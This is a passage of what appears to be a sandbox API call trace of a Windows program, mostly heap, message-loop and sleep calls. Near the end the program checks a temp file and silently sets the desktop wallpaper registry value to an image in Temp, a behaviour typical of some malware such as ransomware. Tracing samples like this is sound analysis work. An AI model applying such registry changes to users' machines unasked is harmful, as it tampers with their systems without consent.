0x2e51ce8 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0299.176] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0299.176] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c28 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c70 [0299.177] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0299.177] FreeLibrary (hLibModule=0x750c0000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0299.177] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0299.178] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0299.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14488 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0299.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0299.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.179] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0299.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0299.179] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0299.179] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14488 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0299.180] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0299.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0299.180] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0299.180] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0299.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0299.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0299.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0299.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0299.180] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0299.180] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf3c0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0299.181] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0299.181] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0299.181] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0299.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0299.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0299.182] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0299.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0299.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0299.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0299.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0299.182] timeGetTime () returned 0x118ad53 [0299.182] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.182] Sleep (dwMilliseconds=0xa) [0299.252] timeGetTime () returned 0x118ad99 [0299.252] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.252] Sleep (dwMilliseconds=0xa) [0299.321] timeGetTime () returned 0x118adde [0299.321] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.321] Sleep (dwMilliseconds=0xa) [0299.522] timeGetTime () returned 0x118aea8 [0299.523] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0299.523] TranslateMessage (lpMsg=0x8cf798) returned 0 [0299.523] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0299.523] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0299.523] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0299.523] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.523] Sleep (dwMilliseconds=0xa) [0299.597] timeGetTime () returned 0x118aef2 [0299.597] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.597] Sleep (dwMilliseconds=0xa) [0299.670] timeGetTime () returned 0x118af3b [0299.670] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.670] Sleep (dwMilliseconds=0xa) [0299.732] timeGetTime () returned 0x118af79 [0299.732] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.732] Sleep (dwMilliseconds=0xa) [0299.766] timeGetTime () returned 0x118af9b [0299.766] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.766] Sleep (dwMilliseconds=0xa) [0299.802] timeGetTime () returned 0x118afc0 [0299.802] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0299.802] Sleep (dwMilliseconds=0xa) [0300.082] timeGetTime () returned 0x118b0d8 [0300.082] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0300.082] Sleep (dwMilliseconds=0xa) [0300.171] timeGetTime () returned 0x118b130 [0300.171] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0300.171] Sleep (dwMilliseconds=0xa) [0300.265] timeGetTime () returned 0x118b18e [0300.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0300.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0300.265] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0300.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0300.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0300.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0300.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0300.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0300.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0300.266] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0300.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0300.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0300.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0300.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0300.267] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0300.267] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0300.267] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0300.267] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0300.268] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0300.268] RegCloseKey (hKey=0x2d0) returned 0x0 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0300.268] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 